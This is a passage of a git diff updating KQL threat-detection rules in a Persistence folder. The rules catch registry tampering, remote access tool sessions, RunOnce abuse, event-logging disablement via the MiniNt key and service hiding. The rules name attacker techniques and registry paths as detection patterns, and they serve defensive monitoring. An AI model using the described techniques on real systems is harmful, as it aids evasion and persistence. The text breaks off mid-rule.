a/KQL/rules/Persistence/registry_hide_function_from_user.kql +++ b/KQL/rules/Persistence/registry_hide_function_from_user.kql @@ -1,12 +1,12 @@ -// Title: Registry Hide Function from User -// Author: frack113 -// Date: 2022-03-18 -// Level: medium -// Description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique) -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Legitimate admin script - -DeviceRegistryEvents +// Title: Registry Hide Function from User +// Author: frack113 +// Date: 2022-03-18 +// Level: medium +// Description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate admin script + +DeviceRegistryEvents | where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowInfoTip" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowCompColor")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideClock" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAHealth" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCANetwork" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAPower" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAVolume")) \ No newline at end of file diff --git a/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql b/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql index 9acd1ea3..6aed05d1 100644 --- a/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql +++ b/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql @@ -1,14 +1,14 @@ -// Title: Registry Manipulation via WMI Stdregprov -// Author: Daniel Koifman (KoifSec) -// Date: 2025-07-30 -// Level: medium -// Description: Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class. -// This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe. -// Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.discovery, attack.t1047, attack.t1112, attack.t1012 -// False Positives: -// - Legitimate administrative activity - -DeviceProcessEvents +// Title: Registry Manipulation via WMI Stdregprov +// Author: Daniel Koifman (KoifSec) +// Date: 2025-07-30 +// Level: medium +// Description: Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class. +// This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe. +// Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.discovery, attack.t1047, attack.t1112, attack.t1012 +// False Positives: +// - Legitimate administrative activity + +DeviceProcessEvents | where (ProcessCommandLine contains "call" and ProcessCommandLine contains "stdregprov") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql b/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql index ba5213dd..87dfa661 100644 --- a/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql +++ b/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql @@ -1,12 +1,12 @@ -// Title: Registry Modification to Hidden File Extension -// Author: frack113 -// Date: 2022-01-22 -// Level: medium -// Description: Hides the file extension through modification of the registry -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1137 -// False Positives: -// - Administrative scripts - -DeviceRegistryEvents +// Title: Registry Modification to Hidden File Extension +// Author: frack113 +// Date: 2022-01-22 +// Level: medium +// Description: Hides the file extension through modification of the registry +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137 +// False Positives: +// - Administrative scripts + +DeviceRegistryEvents | where (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt") \ No newline at end of file diff --git a/KQL/rules/Persistence/registry_modification_via_regini_exe.kql b/KQL/rules/Persistence/registry_modification_via_regini_exe.kql index b53b13d4..eaafc645 100644 --- a/KQL/rules/Persistence/registry_modification_via_regini_exe.kql +++ b/KQL/rules/Persistence/registry_modification_via_regini_exe.kql @@ -1,12 +1,12 @@ -// Title: Registry Modification Via Regini.EXE -// Author: Eli Salem, Sander Wiebing, oscd.community -// Date: 2020-10-08 -// Level: low -// Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1112, attack.defense-evasion -// False Positives: -// - Legitimate modification of keys - -DeviceProcessEvents +// Title: Registry Modification Via Regini.EXE +// Author: Eli Salem, Sander Wiebing, oscd.community +// Date: 2020-10-08 +// Level: low +// Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion +// False Positives: +// - Legitimate modification of keys + +DeviceProcessEvents | where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and (not(ProcessCommandLine matches regex ":[^ \\\\]")) \ No newline at end of file diff --git a/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql b/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql index 63172d2a..a330e552 100644 --- a/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql +++ b/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql @@ -1,12 +1,12 @@ -// Title: Remote Access Tool - AnyDesk Incoming Connection -// Author: @d4ns4n_ (Wuerth-Phoenix) -// Date: 2024-09-02 -// Level: medium -// Description: Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate incoming connections (e.g. sysadmin activity). Most of the time I would expect outgoing connections (initiated locally). - -DeviceNetworkEvents +// Title: Remote Access Tool - AnyDesk Incoming Connection +// Author: @d4ns4n_ (Wuerth-Phoenix) +// Date: 2024-09-02 +// Level: medium +// Description: Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate incoming connections (e.g. sysadmin activity). Most of the time I would expect outgoing connections (initiated locally). + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\AnyDesk.exe" or InitiatingProcessFolderPath endswith "\\AnyDeskMSI.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql b/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql index 487322ea..5a3e8d1e 100644 --- a/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql +++ b/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql @@ -1,12 +1,12 @@ -// Title: Remote Access Tool - ScreenConnect Installation Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2021-02-11 -// Level: medium -// Description: Detects ScreenConnect program starts that establish a remote access to a system. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.initial-access, attack.t1133 -// False Positives: -// - Legitimate use by administrative staff - -DeviceProcessEvents +// Title: Remote Access Tool - ScreenConnect Installation Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-02-11 +// Level: medium +// Description: Detects ScreenConnect program starts that establish a remote access to a system. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 +// False Positives: +// - Legitimate use by administrative staff + +DeviceProcessEvents | where ProcessCommandLine contains "e=Access&" and ProcessCommandLine contains "y=Guest&" and ProcessCommandLine contains "&p=" and ProcessCommandLine contains "&c=" and ProcessCommandLine contains "&k=" \ No newline at end of file diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql index 824167a2..23ff74bf 100644 --- a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql +++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql @@ -1,13 +1,13 @@ -// Title: Remote Access Tool - Team Viewer Session Started On Linux Host -// Author: Josh Nickels, Qi Nan -// Date: 2024-03-11 -// Level: low -// Description: Detects the command line executed when TeamViewer starts a session started by a remote host. -// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.initial-access, attack.t1133 -// False Positives: -// - Legitimate usage of TeamViewer - -DeviceProcessEvents +// Title: Remote Access Tool - Team Viewer Session Started On Linux Host +// Author: Josh Nickels, Qi Nan +// Date: 2024-03-11 +// Level: low +// Description: Detects the command line executed when TeamViewer starts a session started by a remote host. +// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 +// False Positives: +// - Legitimate usage of TeamViewer + +DeviceProcessEvents | where ProcessCommandLine endswith "/TeamViewer_Desktop --IPCport 5939 --Module 1" and FolderPath endswith "/TeamViewer_Desktop" and InitiatingProcessFolderPath endswith "/TeamViewer_Service" \ No newline at end of file diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql index 09ce1d7b..4064ad86 100644 --- a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql +++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql @@ -1,13 +1,13 @@ -// Title: Remote Access Tool - Team Viewer Session Started On MacOS Host -// Author: Josh Nickels, Qi Nan -// Date: 2024-03-11 -// Level: low -// Description: Detects the command line executed when TeamViewer starts a session started by a remote host. -// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.initial-access, attack.t1133 -// False Positives: -// - Legitimate usage of TeamViewer - -DeviceProcessEvents +// Title: Remote Access Tool - Team Viewer Session Started On MacOS Host +// Author: Josh Nickels, Qi Nan +// Date: 2024-03-11 +// Level: low +// Description: Detects the command line executed when TeamViewer starts a session started by a remote host. +// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 +// False Positives: +// - Legitimate usage of TeamViewer + +DeviceProcessEvents | where ProcessCommandLine endswith "/TeamViewer_Desktop --IPCport 5939 --Module 1" and FolderPath endswith "/TeamViewer_Desktop" and InitiatingProcessFolderPath endswith "/TeamViewer_Service" \ No newline at end of file diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql index 9e3f57aa..d3f23e31 100644 --- a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql +++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql @@ -1,13 +1,13 @@ -// Title: Remote Access Tool - Team Viewer Session Started On Windows Host -// Author: Josh Nickels, Qi Nan -// Date: 2024-03-11 -// Level: low -// Description: Detects the command line executed when TeamViewer starts a session started by a remote host. -// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.initial-access, attack.t1133 -// False Positives: -// - Legitimate usage of TeamViewer - -DeviceProcessEvents +// Title: Remote Access Tool - Team Viewer Session Started On Windows Host +// Author: Josh Nickels, Qi Nan +// Date: 2024-03-11 +// Level: low +// Description: Detects the command line executed when TeamViewer starts a session started by a remote host. +// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 +// False Positives: +// - Legitimate usage of TeamViewer + +DeviceProcessEvents | where ProcessCommandLine endswith "TeamViewer_Desktop.exe --IPCport 5939 --Module 1" and FolderPath =~ "TeamViewer_Desktop.exe" and InitiatingProcessFolderPath =~ "TeamViewer_Service.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql b/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql index 05e6c37f..78e93068 100644 --- a/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql +++ b/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql @@ -1,13 +1,13 @@ -// Title: Removal of Potential COM Hijacking Registry Keys -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-05-02 -// Level: medium -// Description: Detects any deletion of entries in ".*\shell\open\command" registry keys. -// These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Legitimate software (un)installations are known to cause false positives. Please add them as a filter when encountered - -DeviceRegistryEvents +// Title: Removal of Potential COM Hijacking Registry Keys +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: medium +// Description: Detects any deletion of entries in ".*\shell\open\command" registry keys. +// These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate software (un)installations are known to cause false positives. Please add them as a filter when encountered + +DeviceRegistryEvents | where RegistryKey endswith "\\shell\\open\\command" and (not((InitiatingProcessFolderPath endswith "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\OpenWith.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Avira\\Antivirus\\", "C:\\Program Files\\Avira\\Antivirus\\")) and (RegistryKey endswith "\\CLSID\\{305CA226-D286-468e-B848-2B2E8E697B74}\\Shell\\Open\\Command" or RegistryKey endswith "\\AntiVir.Keyfile\\shell\\open\\command")) or (InitiatingProcessFolderPath endswith "\\reg.exe" and RegistryKey endswith "\\Discord\\shell\\open\\command") or (InitiatingProcessFolderPath endswith "\\Dropbox.exe" and RegistryKey contains "\\Dropbox.") or (InitiatingProcessFolderPath endswith "C:\\eclipse\\eclipse.exe" and RegistryKey contains "_Classes\\eclipse+") or InitiatingProcessFolderPath contains "\\Microsoft\\EdgeUpdate\\Install" or (InitiatingProcessFolderPath endswith "\\Everything.exe" and RegistryKey contains "\\Everything.") or ((InitiatingProcessFolderPath contains "AppData\\Local\\Temp" and InitiatingProcessFolderPath contains "\\setup.exe") or (InitiatingProcessFolderPath contains "\\Temp\\is-" and InitiatingProcessFolderPath contains "\\target.tmp")) or (InitiatingProcessFolderPath endswith "\\installer.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Java\\" and RegistryKey contains "\\Classes\\WOW6432Node\\CLSID\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}") or InitiatingProcessFolderPath endswith "\\ninite.exe" or (InitiatingProcessFolderPath contains "peazip" and RegistryKey contains "\\PeaZip.") or (InitiatingProcessFolderPath endswith "\\Spotify.exe" and RegistryKey endswith "\\Spotify\\shell\\open\\command") or (InitiatingProcessFolderPath contains "\\Temp" and InitiatingProcessFolderPath contains "\\TeamViewer") or InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\Wireshark_uninstaller.exe" and RegistryKey endswith "\\wireshark-capture-file*")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql index fafaffef..e75d715f 100644 --- a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql +++ b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql @@ -1,12 +1,12 @@ -// Title: RestrictedAdminMode Registry Value Tampering -// Author: frack113 -// Date: 2023-01-13 -// Level: high -// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. -// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. -// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: RestrictedAdminMode Registry Value Tampering +// Author: frack113 +// Date: 2023-01-13 +// Level: high +// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. +// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. +// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin" \ No newline at end of file diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql index aa1efd7c..a8632c16 100644 --- a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql +++ b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql @@ -1,12 +1,12 @@ -// Title: RestrictedAdminMode Registry Value Tampering - ProcCreation -// Author: frack113 -// Date: 2023-01-13 -// Level: high -// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. -// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. -// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceProcessEvents +// Title: RestrictedAdminMode Registry Value Tampering - ProcCreation +// Author: frack113 +// Date: 2023-01-13 +// Level: high +// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. +// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. +// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceProcessEvents | where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "DisableRestrictedAdmin" \ No newline at end of file diff --git a/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql b/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql index 22fa6a98..157fc1b0 100644 --- a/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql +++ b/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql @@ -1,12 +1,12 @@ -// Title: Run Once Task Configuration in Registry -// Author: Avneet Singh @v3t0_, oscd.community -// Date: 2020-11-15 -// Level: medium -// Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Legitimate modification of the registry key by legitimate program - -DeviceRegistryEvents +// Title: Run Once Task Configuration in Registry +// Author: Avneet Singh @v3t0_, oscd.community +// Date: 2020-11-15 +// Level: medium +// Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate modification of the registry key by legitimate program + +DeviceRegistryEvents | where (RegistryKey contains "\\Microsoft\\Active Setup\\Installed Components" and RegistryKey endswith "\\StubPath") and (not(((RegistryValueData contains "C:\\Program Files\\Google\\Chrome\\Application\\" and RegistryValueData contains "\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level") or ((RegistryValueData contains "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or RegistryValueData contains "C:\\Program Files\\Microsoft\\Edge\\Application\\") and RegistryValueData endswith "\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql b/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql index d4510f26..2afb89e2 100644 --- a/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql +++ b/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql @@ -1,10 +1,10 @@ -// Title: Run Once Task Execution as Configured in Registry -// Author: Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated) -// Date: 2020-10-18 -// Level: low -// Description: This rule detects the execution of Run Once task as configured in the registry -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceProcessEvents +// Title: Run Once Task Execution as Configured in Registry +// Author: Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated) +// Date: 2020-10-18 +// Level: low +// Description: This rule detects the execution of Run Once task as configured in the registry +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceProcessEvents | where (ProcessCommandLine contains "/AlternateShellStartup" or ProcessCommandLine endswith "/r") and (FolderPath endswith "\\runonce.exe" or ProcessVersionInfoFileDescription =~ "Run Once Wrapper") \ No newline at end of file diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql index 40bb3976..6d91c21e 100644 --- a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql +++ b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql @@ -1,14 +1,14 @@ -// Title: Security Event Logging Disabled via MiniNt Registry Key - Process -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-04-09 -// Level: high -// Description: Detects attempts to disable security event logging by adding the `MiniNt` registry key. -// This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications. -// Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001 -// False Positives: -// - Highly Unlikely - -DeviceProcessEvents +// Title: Security Event Logging Disabled via MiniNt Registry Key - Process +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-09 +// Level: high +// Description: Detects attempts to disable security event logging by adding the `MiniNt` registry key. +// This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications. +// Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001 +// False Positives: +// - Highly Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\MiniNt") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or ((ProcessCommandLine contains "New-Item " or ProcessCommandLine contains "ni ") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\MiniNt" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql index af522520..68a7bdb7 100644 --- a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql +++ b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql @@ -1,14 +1,14 @@ -// Title: Security Event Logging Disabled via MiniNt Registry Key - Registry Set -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-04-09 -// Level: high -// Description: Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events. -// Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing. -// Adversary may want to disable this service to disable logging of security events which could be used to detect their activities. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001 -// False Positives: -// - Highly Unlikely - -DeviceRegistryEvents +// Title: Security Event Logging Disabled via MiniNt Registry Key - Registry Set +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-09 +// Level: high +// Description: Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events. +// Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing. +// Adversary may want to disable this service to disable logging of security events which could be used to detect their activities. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001 +// False Positives: +// - Highly Unlikely + +DeviceRegistryEvents | where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\MiniNt\\(Default)" \ No newline at end of file diff --git a/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql b/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql index 6274aaec..55e28560 100644 --- a/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql +++ b/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql @@ -1,10 +1,10 @@ -// Title: Service Binary in Suspicious Folder -// Author: Florian Roth (Nextron Systems), frack113 -// Date: 2022-05-02 -// Level: high -// Description: Detect the creation of a service with a service binary located in a suspicious directory -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: Service Binary in Suspicious Folder +// Author: Florian Roth (Nextron Systems), frack113 +// Date: 2022-05-02 +// Level: high +// Description: Detect the creation of a service with a service binary located in a suspicious directory +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where (((RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Perflogs\\" or RegistryValueData contains "\\ADMIN$\\" or RegistryValueData contains "\\Temp\\") and RegistryKey endswith "\\ImagePath" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*") or ((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and (InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Perflogs\\" or InitiatingProcessFolderPath contains "\\ADMIN$\\" or InitiatingProcessFolderPath contains "\\Temp\\") and RegistryKey endswith "\\Start" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*")) and (not(((InitiatingProcessFolderPath contains "\\Common Files\\" and InitiatingProcessFolderPath contains "\\Temp\\") or (RegistryValueData endswith "\\AppData\\Local\\Temp\\MBAMInstallerService.exe\"" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\services.exe" and RegistryKey endswith "\\CurrentControlSet\\Services\\MBAMInstallerService\\ImagePath")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql b/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql index 4d64c17b..c32f37b9 100644 --- a/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql +++ b/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql @@ -1,10 +1,10 @@ -// Title: Service DACL Abuse To Hide Services Via Sc.EXE -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021-12-20 -// Level: high -// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, 